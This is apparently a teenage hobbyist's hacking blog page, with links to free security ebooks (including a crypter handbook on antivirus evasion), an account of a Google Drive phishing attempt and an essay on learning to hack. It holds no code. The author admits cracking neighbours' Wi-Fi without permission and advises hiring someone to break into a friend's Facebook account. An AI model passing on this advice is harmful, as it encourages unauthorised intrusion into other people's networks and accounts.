          Also, the few practical books on hardware hacking that I had as inspiration as a child have long been outdated by the fast pace of technology. This book is intended to fill the need for a practical guide to understanding and reverse engineering modern computers: a handbook for a new generation of hackers. The ultimate benefit of hacking the Xbox is its educational value, or as the saying goes, “Given a fish, eat for a day; learn to fish, eat for a lifetime.” Hence, this book focuses on introducing basic hacking techniques — soldering, reverse engineering, debugging — to novice hackers, while providing hardware references and insight that may be useful to more seasoned hackers. The Xbox has served to educate both the security community and the hacking community: not because it is an outstanding example of security, but because it is a high profile, high volume product made by a large company whose focus was recently defined to be security by its chairman. The Xbox experience shows that building trustable clients in a hostile user environment is hard, even for a large, well-funded company. One observation is that this risk and difficulty of building cheap, trustable hardware clients places an upper bound on the importance of the secret that can be trusted to such client hardware. In addition, the Xbox provides a consistent teaching example, with almost 10 million nearly identical units out there at the time of writing. The similarity of the Xbox’s architecture to a vanilla PC adds even more educational value to Xbox hacking, since much of the discussion in this book also applies directly to the much broader subject of PCs.

          A little teaser of what the book contains: it is nearly 300 pages, so it contains a lot of stuff (on a variety of topics).
          Another interesting aspect of Xbox hacking is the underground society of hardware hackers following the Xbox. The people who hacked the Xbox and the expertise they attained will be relevant long after the Xbox has become a dusty yard sale piece. Hence, there is a conscious social focus to this book. I have included profiles of a sampling of Xbox hacking personalities. The hope is to inspire people, through role models, to pick up a screwdriver and a soldering iron and to start hacking. Instilling this sort of exploratory spirit in the younger generations will be important in the long run for preserving the pool of talented engineers that drove the technology revolution to where it is today. Many of today’s engineers got their start hacking and tinkering with ham radios, telephones and computers which, back in that day, shipped with a complete set of schematics and source code. This pool of engineering talent is essential  for maintaining a healthy economy and for maintaining strong national security in the computer age.

          Download the book

          You can download the book from this website http://www.nostarch.com/xboxfree/ or use the direct link
           http://bunniefoo.com/nostarch/HackingTheXbox_Free.pdf


          Thursday, 3 July 2014

          Hacking Secret Ciphers With Python


          About the ebook


          There are many books that teach beginners how to write secret messages using ciphers. There are a couple books that teach beginners how to hack ciphers. As far as I can tell, there are no books to teach beginners how to write programs to hack ciphers. This book fills that gap.
          This book is for complete beginners who do not know anything about encryption, hacking, or cryptography. The ciphers in this book (except for the RSA cipher in the last chapter) are all centuries old (helps develop basic concepts), and modern computers now have the computational power to hack their encrypted messages.
          No modern organization or individuals use these ciphers anymore. As such, there’s no reasonable context in which you could get into legal trouble for the information in this book.
          This book is for complete beginners who have never programmed before. This book teaches basic programming concepts with the Python programming language. Python is the best language for beginners to learn programming: it is simple and readable yet also a powerful programming language used by professional software developers. The Python software can be downloaded for free from http://python.org and runs on Linux, Windows, OS X, and the Raspberry Pi.
          There are two definitions of “hacker”. A hacker is a person who studies a system (such as the rules of a cipher or a piece of software) to understand it so well that they are not limited by the original rules of that system and can creatively modify it to work in new ways. “Hacker” is also used to mean criminals who break into computer systems, violate people’s privacy, and cause damage. This book uses “hacker” in the first sense. Hackers are cool. Criminals are just people who think they’re being clever by breaking stuff. Personally, my day job as a software developer pays me way more for less work than writing a virus or doing an Internet scam would.
          On a side note, don’t use any of the encryption programs in this book for your actual files. They’re fun to play with but they don’t provide true security. And in general, you shouldn’t trust the ciphers that you yourself make. As legendary cryptographer Bruce Schneier put it, “Anyone, from the most clueless amateur to the best cryptographer, can create an algorithm that he himself can’t break. It’s not even hard. What is hard is creating an algorithm that no one else can break, even after years of analysis. And the only way to prove that is to subject the algorithm to years of analysis by the best cryptographers around.”
          This book is released under a Creative Commons license and is free to copy and distribute (as long as you don’t charge money for it). The book can be downloaded for free from its website at http://inventwithpython.com/hacking. If you ever have questions about how these programs work, feel free to email me at al@inventwithpython.com.

          Anonymous Security Handbook

          0 comments

          About the ebook

This is a security handbook by Anonymous (internet activists or hacktivists) to help its members stay anonymous. While it has no direct utility for you in the context of Anonymous, it has a lot of useful information which will help you protect your privacy on the internet and stay safe as a hacker. You can find more about Anonymous here.


          Anonymous – The Über-Secret Handbook



Note: While I didn't find anything in the ebook which said it was licensed under Creative Commons, I assumed that it isn't copyrighted and that I am free to propagate this material via my blog.

          Wednesday, 2 July 2014

          Encryption - Crypters ebook

          0 comments

          The crypter Handbook

          This ebook can be read directly via your browser.


If you have difficulty reading the book, go to this page to get a full-screen view, or download the ebook for offline reading: https://docs.google.com/file/d/0B5UZaaEGmAw7SkEydGE1UTlPTUk/


See the last few pages of the book for licensing and bibliography (information about the original author and his website).

          Friday, 20 June 2014

          Real Life Phishing Scenario : Zero Day google bug

          0 comments

          A reader on my blog tried to hack my account

Now all this time I've been teaching people how to hack wireless networks, Windows machines, websites and social networking accounts. All this we did in Kali Linux. For once, I'm moving away from the operating system and narrating a real-life incident of how someone almost got my email account and password, and could have possibly infected me with a RAT (remote administration tool). He didn't really mean to hack my account, but was rather interested in making a point. So this is how it happened.



          How it started

Every day, I check my Blogger dashboard to see if there are any new comments on my blog. This morning, I saw an anonymous comment (most of the comments are anonymous, so that didn't alarm me) saying that the person needed my help with something but would only contact me via mail. I couldn't give him my personal mail address, so I decided to use my website's mail instead, and sent him a message. This was his reply:



Looked fair enough. Out of curiosity I clicked the link and it took me to a Google Drive login page. Everything looked pretty convincing, and I could have easily entered my credentials into the login form, if it were not for the slightly suspicious URL. Also, it was HTTPS and Chrome verified the digital certificate to be that of Google. Faking this can be assumed to be next to impossible. However, I was still cautious, considering that I run a hacking blog and it's not unlikely that a person visiting here might be good, maybe a million times better than me.

          What I did

So, I decided I cannot just dismiss the page as phishing without trying. So I entered the email abcd@gmail.com and the password lookslikephishing and pressed sign in. Now if it were a real page, it would have said incorrect password, but this page had no mechanism for verifying the form data; it actually just kept logging everything (i.e. it recorded whatever someone entered in the form) and would simply download the PDF no matter what we entered in the form. So, after entering the bogus login data, the PDF download started. It completed successfully and I ran the PDF. The content looked genuine, and then I realized, well, what if this was a two-fold attack: first phishing, followed by infection. He could have used a FUD remote administration tool which my antivirus wouldn't be able to detect. I have Windows Defender on my Windows 8 machine, but with proper crypting, antiviruses can be evaded. So after this, I went to the white hat section of Hackforums and asked for help (everyone needs help at some time or the other, and I suck at forensics and related stuff). An expert analyzed my computer thoroughly via TeamViewer, and the file was clean indeed. Meanwhile, the following mails had been sent to me.

Mails Received


          He sent me some mails
          He knew I found out the phishing page thing
          He said he wants me to spread public awareness regarding this kind of phishing

          I replied to him saying that I'm finding out and cleaning the malware he sent me (if any). He replied and said he didn't send any malware or anything.

          Finally

I contacted him via FB. He turned out to be a fellow Indian and was even younger than me (I'm 17, he is 16). By this time I had finished my investigation, and the white hat expert from Hackforums didn't find anything either. I finally concluded that either there is no malware, or he's just too good. The latter is quite unlikely, since he was not able to dig up my personal email address on his own. Believe me, that's really easy to do. After having a conversation with him and doing some research on this HTTPS phishing page, I realized that it is done using a bug in Google Drive, which has been discussed on The Hacker News. I will see if I can replicate an HTTPS phishing website using this bug, and post a tutorial on how to do it. The sole intent of this post is to make people aware that phishing is a real threat, and to encourage Google to fix this bug soon. Either way, they will surely patch this bug after I write the tutorial on creating a phishing page using Google Drive, as Google won't want its users' accounts to be compromised by any random kid with a laptop who ended up on this website. They have already applied a patch which makes carrying this out difficult; during the earlier days of this vulnerability, the URL was short and not suspicious at all, but now it's very long (see the screenshots). Update: Google is probably not going to do anything about the issue, as it is not a bug, and I'm not gonna take the risk of writing anything which will usher upon me the wrath of Google (as I use Blogger for hosting, and Blogger is owned by Google). Google Drive, just like Dropbox, allows hosting simple HTML sites like this phishing one. This can be abused, since some people will not know that this is a malicious document uploaded by someone and not a legit Google Drive login page, but it still is not a bug.
          Hacker's message on FB
After I told the hacker on Facebook about this post, even he acknowledged that everything about this attack is perfect except the URL, which earlier used to start with Google Drive but now has a long suspicious prefix. The vulnerability has been half patched, and Google will possibly patch the remaining part soon.

          Tuesday, 17 June 2014

          So You Want To Be A Hacker

          0 comments
Ah! The world of hackers. It has changed much from the fabled green-on-black terminal operated by guys with spectacles on their eyes and a serious look on their face. Now even a script kiddie who types a few lines on Kali Linux calls himself a hacker. The terminal is still there, but the colors have changed. It's a black terminal with text of all colors. But who cares about the colors. It's the new operating systems, the likes of Kali Linux, Backtrack, BackBox Linux, Node Zero, Blackbuntu, and many more, which have made hacking much easier. However, has it gotten easy enough? No. Not at all.



          It's getting harder

          When the going gets tough, the tough get going
While Kali Linux can make hacking Windows XP, wireless networks, and some weak websites very easy, it doesn't mean it is a magical solution to all problems. Everything that can be hacked easily is ancient. No one uses Windows XP anymore, and if they do, the machines are patched because of automatic updates. Very few websites are vulnerable to the standard SQL injection attacks. You'll have to think up and use variants of standard injections to counter the defenses. Yes, WEP networks are easy to hack, and are still abundant, especially in developing countries. But if you want to hack Facebook, then you should step back already; you're going in the wrong direction. Facebook isn't paying millions for security so that a kid can Google up the procedure to hack FB and be done with it overnight. But wait, how could I even imagine that you've already reached this point? While all this hacking XP and WEP shit is pretty easy, is it okay to assume you can do it, and are worried about the 'harder' part? Or wait, are you experiencing difficulty in even using Kali Linux? Can't figure out how to install it? Well...

          Oh well

          First time is always the hardest
          In the previous few paragraphs I made a big mistake. I assumed that you have installed Kali Linux and can do some basic stuff with it, and the intermediate level tasks are bothering you. I almost forgot how it was for me. Well let me tell you.


1. I was 12. Wanted to hack this wireless network next door.
2. Downloaded some shitty Windows software. Didn't work. Plus it had malware installed, which had to be removed with an antivirus.
3. More googling, came across BT4. Googled up some tutorials on how to install it. Was too stupid for VMware. Live? No. Couldn't create a bootable USB. I downloaded the OS and simply copied it to the USB and thought it would boot. Googled more. Some result said something about boot order. Okay, make USB boot before hard disk. Made some sense, but it wouldn't work. As it is, I was scared as hell when modifying stuff in the scary-looking BIOS interface, hoping I wouldn't do any damage.
4. Some time later, BT5 was released. Me? A bit smarter this time. Could get BT5 to boot. Read some WEP hacking tutorials. Wasn't able to follow. I even had a tough time getting the GUI to start. In BT5 we had to type startx for starting the X display server. Didn't know that. Finally, hacked wifi using Aircrack-ng GTK or something (don't remember the name exactly, but it was the GUI mode of aircrack, and it was pretty easy for a beginner like me to use it).
5. Took me a year before I knew how to do stuff without a GUI. A year sounds like a long time, but remember, I have much more stuff to do than just hack. I used BT5 once every few months, only when a new network would show up in the neighbourhood, and I would hack it with my laptop.
6. Had a great sense of accomplishment inside me. Felt like I was king of this territory, and owned every wireless network here. But then, a WPA2 network appeared. I tried everything I could, but gave up. I read a tutorial on Hackforums on using the WPS vulnerability to hack WPA. Well, it looked like it was written in an alien language. Honestly, after knowing how easy hacking WPS-enabled WPA networks is, I seriously think that the first time indeed is the hardest.
7. Fast forward to this moment. I have mastered the basics of the Linux command line interface, but still have a lot to learn. I can write bash scripts to automate stuff, and can use most of the tools with ease. I am currently studying exploit development and research and can write simple exploits. There's a lot left to learn. I know the depths of wireless pentesting, but only an intermediate level of web pentesting. I know the basics of social engineering, but again, a lot of things to learn. Now if you are concluding I'm an idiot on the basis of the fact that in every field I just know the basics, well then you need to realize that the meaning of basics in my perspective is much different from that in yours. I need to know a lot of stuff, but I know a lot too.
So what do you conclude from this? Well, if you are not able to install Kali, or follow any other tutorial on my website, then don't be surprised. If everyone who visits this website became a hacker, then we'd have more than 100k hackers created from this website alone, which isn't a good thing at all, considering there are many other websites which receive much more traffic than mine.

          Why so difficult

          Hacking is an art
Because that's the way it is. Hacking is an art, and like any other, it takes practice, hard work and determination to master this art. For example, after watching Dynamo on TV, I got lured into the idea of becoming a magician. Well, I tried some tricks, but failed miserably. Realized it was not my piece of cake. Some of the tricks require years of practice before they can be pulled off successfully. Not everyone who decides to be a magician ends up becoming one. There are obstacles in the way, disappointments, milestones too hard to achieve. Only the ones who stay determined all the way to the end achieve this. It's not everyone's piece of cake. Same goes with hacking. What makes hackers exclusive and special is the fact that not everyone is a hacker. I am known in my class (the whole school as well) for being a hacker. Why? Because I'm the only one. Not everyone who sets out to be a hacker becomes one. But there's more to the story than this.


          Not that difficult

          You are lucky that you ended up on this blog (not a quote as such)
Well, the sites I used to learn hacking were crap. The WEP tutorial was just 3-4 lines of code and no explanation. I won't be wrong if I say that, while I read a lot of tutorials, none was good enough. For every line in a tutorial, I had to google up another tutorial which explained what it meant. That is, I worked hard and figured everything out on my own. You, however, are lucky. The posts in this blog have been written such that everything is properly explained. In the later tutorials I have been a bit lazy, but it won't be a problem if you follow the tutorials in the correct sequence. If you have read 2-3 tutorials on pentesting, you would already know the basics, and the 4th one wouldn't have to be very detailed. If you jump to Win 7 hacking without going through XP, then you'll encounter difficulties. Now I have created a page on this blog where I have ordered the posts in the desirable order of reading. You might also look at the navigation menu on top and read all the tutorials from top to bottom. And here's the truth, finally.

          The truth

          I want to hack facebook
If you are learning hacking to hack your friend's account, then you're never going to become a hacker. Just hire someone to do it. Because the time and effort you'll invest in making an attempt to learn how to do it yourself, and eventually failing in the same, is much more valuable than the money required to hire someone (no, I don't hack FB accounts for money). You might still try social engineering, but it is not a 100% working method, and well, phishing is not hacking, and is illegal. However, if your motives aren't that selfish, and if you are on a quest for knowledge, then rest assured, you will achieve success. Also, you need to know the art of google-fu. If you face any difficulties, remember, Google is a friend (and so am I; I have replied to 100s of comments on this blog personally and always get people through difficulties). The last thing: 50% of the people who come to this blog leave within 1 min of their visit, after seeing just one page. 30% stay for 4-10 mins and read 2 posts. 20% stay for more than 10 minutes, and keep coming back. Only these 20% will successfully become hackers. Either they succeeded in achieving what they wanted, loved the blog, and came back for more, or they didn't succeed, but came back to try again, and I'm sure they would succeed on a second attempt. Remember, never give up. Less than 20% of the visitors here actually succeed in getting what they want; try to be in that 20%. And if you have any suggestion for this post or for my way of explanation or anything else in general, please comment.